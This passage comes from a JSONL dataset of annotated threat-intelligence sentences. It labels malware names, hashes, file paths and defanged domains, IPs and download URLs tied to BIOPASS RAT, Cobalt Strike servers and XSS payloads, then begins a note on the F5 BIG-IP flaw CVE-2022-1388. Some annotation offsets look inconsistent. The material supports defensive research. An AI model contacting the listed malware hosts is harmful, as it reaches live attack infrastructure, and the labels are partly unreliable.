:"duplicate-of"},{"id":660,"from_id":10287,"to_id":49087,"type":"duplicate-of"},{"id":661,"from_id":49088,"to_id":10288,"type":"duplicate-of"},{"id":662,"from_id":49086,"to_id":10286,"type":"duplicate-of"},{"id":663,"from_id":49084,"to_id":10284,"type":"duplicate-of"},{"id":664,"from_id":49082,"to_id":10282,"type":"duplicate-of"},{"id":665,"from_id":49080,"to_id":10280,"type":"duplicate-of"},{"id":666,"from_id":49078,"to_id":10278,"type":"duplicate-of"},{"id":667,"from_id":49089,"to_id":10276,"type":"duplicate-of"},{"id":668,"from_id":10276,"to_id":49076,"type":"indicates"},{"id":669,"from_id":49089,"to_id":49076,"type":"indicates"},{"id":670,"from_id":49078,"to_id":49077,"type":"indicates"},{"id":671,"from_id":10278,"to_id":49077,"type":"indicates"},{"id":672,"from_id":49080,"to_id":49079,"type":"indicates"},{"id":673,"from_id":10280,"to_id":49079,"type":"indicates"},{"id":674,"from_id":49082,"to_id":49081,"type":"indicates"},{"id":675,"from_id":10282,"to_id":49081,"type":"indicates"},{"id":676,"from_id":49084,"to_id":49083,"type":"indicates"},{"id":677,"from_id":10284,"to_id":49083,"type":"indicates"},{"id":678,"from_id":49086,"to_id":49085,"type":"indicates"},{"id":679,"from_id":10286,"to_id":49085,"type":"indicates"},{"id":680,"from_id":49088,"to_id":10287,"type":"indicates"}],"Comments":[]} {"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} {"id":3411,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe ","entities":[{"id":10291,"label":"malware","start_offset":0,"end_offset":11},{"id":10292,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49092,"label":"malware","start_offset":20,"end_offset":44},{"id":49093,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":685,"from_id":10291,"to_id":49092,"type":"duplicate-of"},{"id":686,"from_id":49093,"to_id":10292,"type":"duplicate-of"},{"id":687,"from_id":49093,"to_id":49092,"type":"indicates"},{"id":688,"from_id":10292,"to_id":49092,"type":"indicates"}],"Comments":[]} {"id":3412,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd test.exe","entities":[{"id":10293,"label":"malware","start_offset":0,"end_offset":11},{"id":10294,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49094,"label":"malware","start_offset":20,"end_offset":44},{"id":49095,"label":"FILEPATH","start_offset":112,"end_offset":120}],"relations":[{"id":689,"from_id":10293,"to_id":49094,"type":"duplicate-of"},{"id":690,"from_id":49095,"to_id":10294,"type":"duplicate-of"},{"id":691,"from_id":49095,"to_id":49094,"type":"indicates"},{"id":692,"from_id":10294,"to_id":49094,"type":"indicates"}],"Comments":[]} {"id":3413,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c11906210465045a54a5de1053ce0624308a8c7b342bb707a24e534ca662dc89 test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A c3fa69e15a63b151f8d1dc3018284e153ad2eb672d54555eaeaac79396b64e3b test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 flashplayerpp_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c8542bffc7a2074b8d84c4de5f18e3c8ced30b1f6edc13047ce99794b388285c flash2.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10295,"label":"malware","start_offset":0,"end_offset":11},{"id":10296,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10297,"label":"malware","start_offset":128,"end_offset":139},{"id":10298,"label":"SHA2","start_offset":174,"end_offset":238},{"id":10299,"label":"malware","start_offset":250,"end_offset":261},{"id":10300,"label":"SHA2","start_offset":296,"end_offset":360},{"id":10301,"label":"malware","start_offset":392,"end_offset":403},{"id":10303,"label":"malware","start_offset":516,"end_offset":527},{"id":10302,"label":"SHA2","start_offset":438,"end_offset":502},{"id":49098,"label":"FILEPATH","start_offset":112,"end_offset":126},{"id":49101,"label":"FILEPATH","start_offset":362,"end_offset":390},{"id":49102,"label":"malware","start_offset":412,"end_offset":436},{"id":49096,"label":"malware","start_offset":20,"end_offset":44},{"id":49097,"label":"malware","start_offset":148,"end_offset":172},{"id":49099,"label":"FILEPATH","start_offset":240,"end_offset":248},{"id":49100,"label":"malware","start_offset":270,"end_offset":294},{"id":49103,"label":"FILEPATH","start_offset":504,"end_offset":514}],"relations":[{"id":696,"from_id":10298,"to_id":49099,"type":"duplicate-of"},{"id":698,"from_id":49101,"to_id":10300,"type":"duplicate-of"},{"id":700,"from_id":49103,"to_id":10302,"type":"duplicate-of"},{"id":701,"from_id":10296,"to_id":49096,"type":"indicates"},{"id":702,"from_id":49098,"to_id":49096,"type":"indicates"},{"id":703,"from_id":10298,"to_id":49097,"type":"indicates"},{"id":704,"from_id":49099,"to_id":49097,"type":"indicates"},{"id":693,"from_id":10295,"to_id":49096,"type":"duplicate-of"},{"id":694,"from_id":49098,"to_id":10296,"type":"duplicate-of"},{"id":695,"from_id":10297,"to_id":49097,"type":"duplicate-of"},{"id":697,"from_id":10299,"to_id":49100,"type":"duplicate-of"},{"id":699,"from_id":10301,"to_id":49102,"type":"duplicate-of"},{"id":705,"from_id":49101,"to_id":49100,"type":"indicates"},{"id":706,"from_id":10300,"to_id":49100,"type":"indicates"},{"id":707,"from_id":10302,"to_id":49102,"type":"indicates"},{"id":708,"from_id":49103,"to_id":49102,"type":"indicates"}],"Comments":[]} {"id":3414,"text":"Win64.BIOPASS.A","entities":[{"id":49104,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3415,"text":" cce6b17084a996e2373aaebbace944a17d3e3745e9d88efad4947840ae92fd55","entities":[{"id":10304,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3416,"text":"Silverlight_ins.exe ","entities":[{"id":49105,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3417,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} {"id":3418,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10307,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3419,"text":"Win64.BIOPASS.A","entities":[{"id":49108,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3420,"text":" e4109875e84b3e9952ef362abc5b826c003b3d0b1b06d530832359906b0b8831","entities":[{"id":10308,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3421,"text":" flash.exe BIOPASS RAT Loader","entities":[{"id":10309,"label":"malware","start_offset":12,"end_offset":23},{"id":49109,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} {"id":3422,"text":" Backdoor.Win64.BIOPASS.A e52ea54cfe3afd93a53e368245c5630425e326291bf1b2599b75dbf8e75b7aeb flashplayer_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A f1ad25b594a855a3c9af75c5da74b44d900f6fbb655033f9a98a956292011c8e Silverlight.exe","entities":[{"id":10311,"label":"malware","start_offset":121,"end_offset":132},{"id":10310,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10312,"label":"SHA2","start_offset":167,"end_offset":231},{"id":49110,"label":"malware","start_offset":1,"end_offset":25},{"id":49111,"label":"malware","start_offset":141,"end_offset":165},{"id":49112,"label":"FILEPATH","start_offset":93,"end_offset":119},{"id":49113,"label":"FILEPATH","start_offset":233,"end_offset":248}],"relations":[{"id":716,"from_id":49113,"to_id":49111,"type":"indicates"},{"id":717,"from_id":10311,"to_id":49111,"type":"duplicate-of"},{"id":713,"from_id":49112,"to_id":10310,"type":"duplicate-of"},{"id":714,"from_id":49113,"to_id":10312,"type":"duplicate-of"},{"id":715,"from_id":10312,"to_id":49111,"type":"indicates"},{"id":718,"from_id":49112,"to_id":49110,"type":"indicates"},{"id":719,"from_id":10310,"to_id":49110,"type":"indicates"}],"Comments":[]} {"id":3423,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa1d70b6b5b1a5e478c7d9d840aae0cc23d80476d9eea884a73d1b7e3926a209 64.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa7fbca583b22d92ae6d832d90ee637cc6ac840203cd059c6582298beb955aee test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10313,"label":"malware","start_offset":0,"end_offset":11},{"id":10315,"label":"malware","start_offset":120,"end_offset":131},{"id":10317,"label":"malware","start_offset":242,"end_offset":253},{"id":10314,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10316,"label":"SHA2","start_offset":166,"end_offset":230},{"id":49115,"label":"FILEPATH","start_offset":112,"end_offset":118},{"id":49116,"label":"malware","start_offset":140,"end_offset":164},{"id":49117,"label":"FILEPATH","start_offset":232,"end_offset":240},{"id":49114,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":720,"from_id":10313,"to_id":49114,"type":"duplicate-of"},{"id":723,"from_id":10317,"to_id":49116,"type":"duplicate-of"},{"id":728,"from_id":10316,"to_id":49116,"type":"indicates"},{"id":721,"from_id":49115,"to_id":10314,"type":"duplicate-of"},{"id":722,"from_id":49117,"to_id":10316,"type":"duplicate-of"},{"id":724,"from_id":10315,"to_id":49116,"type":"duplicate-of"},{"id":725,"from_id":10314,"to_id":49114,"type":"indicates"},{"id":726,"from_id":49115,"to_id":49114,"type":"indicates"},{"id":727,"from_id":49117,"to_id":49116,"type":"indicates"}],"Comments":[]} {"id":3424,"text":"Win64.BIOPASS.A","entities":[{"id":49118,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3425,"text":" fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851","entities":[{"id":10318,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3426,"text":"test4.exe BIOPASS RAT Loader ","entities":[{"id":10319,"label":"malware","start_offset":11,"end_offset":22},{"id":49119,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":3427,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} {"id":3428,"text":"Win64.BIOPASS.A","entities":[{"id":49120,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3429,"text":" fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc","entities":[{"id":10320,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3430,"text":"flash_installer.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10321,"label":"malware","start_offset":21,"end_offset":32},{"id":49121,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3431,"text":"Win64.BIOPASS.A","entities":[{"id":49122,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3432,"text":" ee2e9a1d3b593fd464f885b734d469d047cdb1bc879e568e7c33d786e8d1e8e2","entities":[{"id":10322,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3433,"text":"aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan","entities":[{"id":10324,"label":"SHA2","start_offset":67,"end_offset":131},{"id":10330,"label":"SHA2","start_offset":471,"end_offset":535},{"id":10332,"label":"SHA2","start_offset":601,"end_offset":665},{"id":10326,"label":"SHA2","start_offset":200,"end_offset":264},{"id":10328,"label":"SHA2","start_offset":333,"end_offset":397},{"id":49123,"label":"FILEPATH","start_offset":0,"end_offset":7},{"id":49129,"label":"malware","start_offset":280,"end_offset":307},{"id":49132,"label":"FILEPATH","start_offset":667,"end_offset":673},{"id":49135,"label":"malware","start_offset":147,"end_offset":174},{"id":49136,"label":"malware","start_offset":418,"end_offset":445},{"id":49124,"label":"malware","start_offset":43,"end_offset":65},{"id":49125,"label":"FILEPATH","start_offset":133,"end_offset":145},{"id":49126,"label":"malware","start_offset":176,"end_offset":198},{"id":49127,"label":"FILEPATH","start_offset":266,"end_offset":278},{"id":49128,"label":"malware","start_offset":309,"end_offset":331},{"id":49130,"label":"FILEPATH","start_offset":399,"end_offset":416},{"id":49131,"label":"FILEPATH","start_offset":537,"end_offset":546},{"id":49133,"label":"malware","start_offset":577,"end_offset":599},{"id":49134,"label":"malware","start_offset":9,"end_offset":41},{"id":49137,"label":"malware","start_offset":447,"end_offset":469},{"id":49138,"label":"malware","start_offset":548,"end_offset":575},{"id":49139,"label":"malware","start_offset":675,"end_offset":710}],"relations":[{"id":729,"from_id":49123,"to_id":49124,"type":"indicates"},{"id":730,"from_id":49134,"to_id":49124,"type":"duplicate-of"},{"id":731,"from_id":10324,"to_id":49124,"type":"indicates"},{"id":732,"from_id":49125,"to_id":49124,"type":"indicates"},{"id":733,"from_id":49135,"to_id":49126,"type":"duplicate-of"},{"id":734,"from_id":10326,"to_id":49126,"type":"indicates"},{"id":735,"from_id":49127,"to_id":49126,"type":"indicates"},{"id":736,"from_id":49127,"to_id":10326,"type":"duplicate-of"},{"id":737,"from_id":49129,"to_id":49128,"type":"duplicate-of"},{"id":738,"from_id":10328,"to_id":49128,"type":"indicates"},{"id":739,"from_id":49130,"to_id":49128,"type":"indicates"},{"id":740,"from_id":49130,"to_id":10328,"type":"duplicate-of"},{"id":741,"from_id":49136,"to_id":49137,"type":"duplicate-of"},{"id":742,"from_id":49131,"to_id":10330,"type":"duplicate-of"},{"id":743,"from_id":49131,"to_id":49137,"type":"indicates"},{"id":744,"from_id":10330,"to_id":49137,"type":"indicates"},{"id":745,"from_id":49138,"to_id":49133,"type":"duplicate-of"},{"id":746,"from_id":49139,"to_id":49133,"type":"duplicate-of"},{"id":747,"from_id":49132,"to_id":10332,"type":"duplicate-of"},{"id":748,"from_id":49132,"to_id":49133,"type":"indicates"},{"id":749,"from_id":10332,"to_id":49133,"type":"indicates"}],"Comments":[]} {"id":3434,"text":".Win32.BIOPASS.A 17e43d31585b4c3ac6bf724bd7263761af75a59335b285b045fce597b3825ed0","entities":[{"id":10334,"label":"SHA2","start_offset":18,"end_offset":82},{"id":49140,"label":"malware","start_offset":1,"end_offset":16}],"relations":[],"Comments":[]} {"id":3435,"text":"systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A b3bd28951789ef7cfaf659e07e198b45b04a2f3cde268e6ede4d4f877959341e systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A e0caebfbd2804fcde30e75f2c6d06e84b3bf89ed85db34d6f628b25dca7a9a0f YIZHI_SIGNED.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A 2503549352527cb0ffa1811a44481f6980961d98f9d5a96d5926d5676c31b9ee socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 8ba72a391fb653b2cc1e5caa6f927efdf46568638bb4fc25e6f01dc36a96533b flashplayerpp_install_cn.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783 beep.sys Derusbi Trojan.Win64.DERUSBI.C a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97 Browser_plugin (8).exe Cobalt Strike Loader Trojan.Win64.COBEACON.SUX IP\/Domain\/URL Note webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders softres[.]oss-accelerate[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT modules and stolen data lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host Cobalt Strike loader scripts bps-rhk[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for RTMP live streaming wxdget[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for storing stolen WeChat data chinanode[.]microsoft-update-service[.]com:38080 BIOPASS RAT C&C server 0x3s[.]com XSS attack domain update[.]flash-installer[.]com Associated fake installer domain update[.]flash-installers[.]com Associated fake installer domain flash[.]com[.]cm Associated fake installer domain flash[.]com[.]se Associated fake installer domain flashi[.]com[.]cn Associated fake installer domain flash[.]co[.]cm Associated fake installer domain 47[.]57[.]142[.]30 Cobalt Strike C&C server 47[.]57[.]186[.]151 Cobalt Strike C&C server 103[.]158[.]190[.]58 Cobalt Strike C&C server 207[.]148[.]100[.]49 Cobalt Strike C&C server microsoft[.]update[.]flash[.]com.se Cobalt Strike C&C server hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong.aliyuncs[.]com\/Silverlight_ins.exe BIOPASS RAT loader download URL hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com\/flash_ins[.]exe BIOPASS RAT loader download URL hxxp:\/\/softres.oss-accelerate[.]aliyuncs[.]com\/Silverlight[.]exe BIOPASS RAT loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/big.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/Online.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/files.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/ServiceHub.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/c1222.txt c1222 module script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/cdaemon.txt cdaemon module download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/x.txt Cobalt Strike Python loader download URL hxxp:\/\/lualibs.oss-cn-hongkong[.]aliyuncs.com\/x86\/1-CS-443.lua Cobalt Strike Lua loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/s.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc2.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc3.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/getwechatdb.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/wechat.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss_spoof.zip xss_spoof plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss.txt XSS payload download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/script.txt XSS payload download URL hxxp:\/\/0x3s[.]com\/x[.]js XSS injection URL Tags Malware | Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[{"id":10335,"label":"malware","start_offset":19,"end_offset":30},{"id":10337,"label":"malware","start_offset":162,"end_offset":173},{"id":10338,"label":"SHA2","start_offset":220,"end_offset":284},{"id":10339,"label":"malware","start_offset":315,"end_offset":326},{"id":10341,"label":"malware","start_offset":453,"end_offset":464},{"id":10343,"label":"malware","start_offset":602,"end_offset":613},{"id":10344,"label":"MD5","start_offset":655,"end_offset":719},{"id":10346,"label":"SHA2","start_offset":764,"end_offset":828},{"id":10350,"label":"malware","start_offset":1047,"end_offset":1058},{"id":10353,"label":"malware","start_offset":1145,"end_offset":1156},{"id":10356,"label":"malware","start_offset":1256,"end_offset":1267},{"id":10336,"label":"SHA2","start_offset":77,"end_offset":141},{"id":10345,"label":"malware","start_offset":731,"end_offset":738},{"id":10340,"label":"SHA2","start_offset":373,"end_offset":437},{"id":10342,"label":"SHA2","start_offset":506,"end_offset":570},{"id":10360,"label":"tools","start_offset":1371,"end_offset":1384},{"id":10347,"label":"tools","start_offset":854,"end_offset":867},{"id":10363,"label":"malware","start_offset":1648,"end_offset":1659},{"id":10365,"label":"IPV4","start_offset":2044,"end_offset":2062},{"id":10367,"label":"IPV4","start_offset":2090,"end_offset":2109},{"id":10369,"label":"IPV4","start_offset":2137,"end_offset":2157},{"id":10371,"label":"IPV4","start_offset":2185,"end_offset":2205},{"id":10374,"label":"tools","start_offset":2270,"end_offset":2283},{"id":10375,"label":"malware","start_offset":2405,"end_offset":2416},{"id":10376,"label":"malware","start_offset":2541,"end_offset":2552},{"id":10377,"label":"malware","start_offset":2640,"end_offset":2651},{"id":10378,"label":"malware","start_offset":2746,"end_offset":2757},{"id":10379,"label":"malware","start_offset":2855,"end_offset":2866},{"id":10380,"label":"tools","start_offset":3403,"end_offset":3416},{"id":10386,"label":"attack-pattern","start_offset":4328,"end_offset":4331},{"id":10387,"label":"attack-pattern","start_offset":4440,"end_offset":4443},{"id":10388,"label":"attack-pattern","start_offset":4492,"end_offset":4495},{"id":10382,"label":"tools","start_offset":3509,"end_offset":3522},{"id":10383,"label":"tools","start_offset":3619,"end_offset":3632},{"id":10384,"label":"tools","start_offset":3730,"end_offset":3743},{"id":10385,"label":"tools","start_offset":3841,"end_offset":3854},{"id":10370,"label":"tools","start_offset":2159,"end_offset":2172},{"id":10368,"label":"tools","start_offset":2111,"end_offset":2124},{"id":10372,"label":"tools","start_offset":2207,"end_offset":2220},{"id":10366,"label":"tools","start_offset":2064,"end_offset":2077},{"id":49152,"label":"malware","start_offset":482,"end_offset":504},{"id":49159,"label":"DOMAIN","start_offset":1293,"end_offset":1335},{"id":49166,"label":"DOMAIN","start_offset":1703,"end_offset":1733},{"id":49172,"label":"DOMAIN","start_offset":2233,"end_offset":2268},{"id":49141,"label":"FILEPATH","start_offset":0,"end_offset":17},{"id":49147,"label":"FILEPATH","start_offset":721,"end_offset":729},{"id":49148,"label":"FILEPATH","start_offset":830,"end_offset":852},{"id":49149,"label":"attack-pattern","start_offset":1684,"end_offset":1694},{"id":49150,"label":"malware","start_offset":196,"end_offset":218},{"id":49153,"label":"malware","start_offset":631,"end_offset":653},{"id":49154,"label":"malware","start_offset":740,"end_offset":762},{"id":49156,"label":"DOMAIN","start_offset":930,"end_offset":1011},{"id":49142,"label":"malware","start_offset":53,"end_offset":75},{"id":49151,"label":"malware","start_offset":349,"end_offset":371},{"id":49155,"label":"malware","start_offset":876,"end_offset":901},{"id":49162,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49169,"label":"DOMAIN","start_offset":1888,"end_offset":1904},{"id":49170,"label":"DOMAIN","start_offset":1940,"end_offset":1957},{"id":49171,"label":"DOMAIN","start_offset":1993,"end_offset":2008},{"id":49143,"label":"FILEPATH","start_offset":143,"end_offset":160},{"id":49144,"label":"FILEPATH","start_offset":297,"end_offset":313},{"id":49145,"label":"FILEPATH","start_offset":439,"end_offset":451},{"id":49146,"label":"FILEPATH","start_offset":572,"end_offset":600},{"id":49157,"label":"DOMAIN","start_offset":1059,"end_offset":1109},{"id":49158,"label":"DOMAIN","start_offset":1166,"end_offset":1220},{"id":49160,"label":"DOMAIN","start_offset":1401,"end_offset":1443},{"id":49161,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49189,"label":"DOMAIN","start_offset":4124,"end_offset":4211},{"id":49191,"label":"DOMAIN","start_offset":4354,"end_offset":4438},{"id":49163,"label":"DOMAIN","start_offset":1598,"end_offset":1646},{"id":49164,"label":"DOMAIN","start_offset":1672,"end_offset":1682},{"id":49165,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49167,"label":"DOMAIN","start_offset":1836,"end_offset":1852},{"id":49168,"label":"DOMAIN","start_offset":1769,"end_offset":1800},{"id":49174,"label":"DOMAIN","start_offset":2438,"end_offset":2539},{"id":49175,"label":"DOMAIN","start_offset":2574,"end_offset":2638},{"id":49176,"label":"DOMAIN","start_offset":2673,"end_offset":2744},{"id":49178,"label":"DOMAIN","start_offset":2888,"end_offset":2961},{"id":49179,"label":"DOMAIN","start_offset":3000,"end_offset":3078},{"id":49181,"label":"DOMAIN","start_offset":3226,"end_offset":3301},{"id":49184,"label":"DOMAIN","start_offset":3548,"end_offset":3617},{"id":49188,"label":"DOMAIN","start_offset":4004,"end_offset":4088},{"id":49192,"label":"DOMAIN","start_offset":4466,"end_offset":4490},{"id":49173,"label":"DOMAIN","start_offset":2296,"end_offset":2403},{"id":49177,"label":"DOMAIN","start_offset":2779,"end_offset":2853},{"id":49180,"label":"DOMAIN","start_offset":3117,"end_offset":3190},{"id":49182,"label":"DOMAIN","start_offset":3332,"end_offset":3401},{"id":49183,"label":"DOMAIN","start_offset":3445,"end_offset":3507},{"id":49185,"label":"DOMAIN","start_offset":3657,"end_offset":3728},{"id":49186,"label":"DOMAIN","start_offset":3768,"end_offset":3839},{"id":49190,"label":"DOMAIN","start_offset":4245,"end_offset":4326},{"id":49187,"label":"DOMAIN","start_offset":3879,"end_offset":3968}],"relations":[],"Comments":[]} {"id":3436,"text":"This post is also available in: 日本語 (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} {"id":3437,"text":"Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":49198,"label":"attack-pattern","start_offset":48,"end_offset":69},{"id":49200,"label":"vulnerability","start_offset":26,"end_offset":44},{"id":49199,"label":"attack-pattern","start_offset":74,"end_offset":113}],"relations":[{"id":752,"from_id":49198,"to_id":49200,"type":"targets"},{"id":753,"from_id":49199,"to_id":49200,"type":"targets"}],"Comments":[]} {"id":3438,"text":"This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score.","entities":[],"relations":[],"Comments":[]} {"id":3439,"text":"Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.","entities":[{"id":49201,"label":"identity","start_offset":149,"end_offset":168},{"id":49203,"label":"vulnerability","start_offset":225,"end_offset":268},{"id":49204,"label":"TIME","start_offset":285,"end_offset":293},{"id":49202,"label":"tools","start_offset":215,"end_offset":224}],"relations":[{"id":754,"from_id":49202,"to_id":49203,"type":"has"}],"Comments":[]} {"id":3440,"text":" Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP 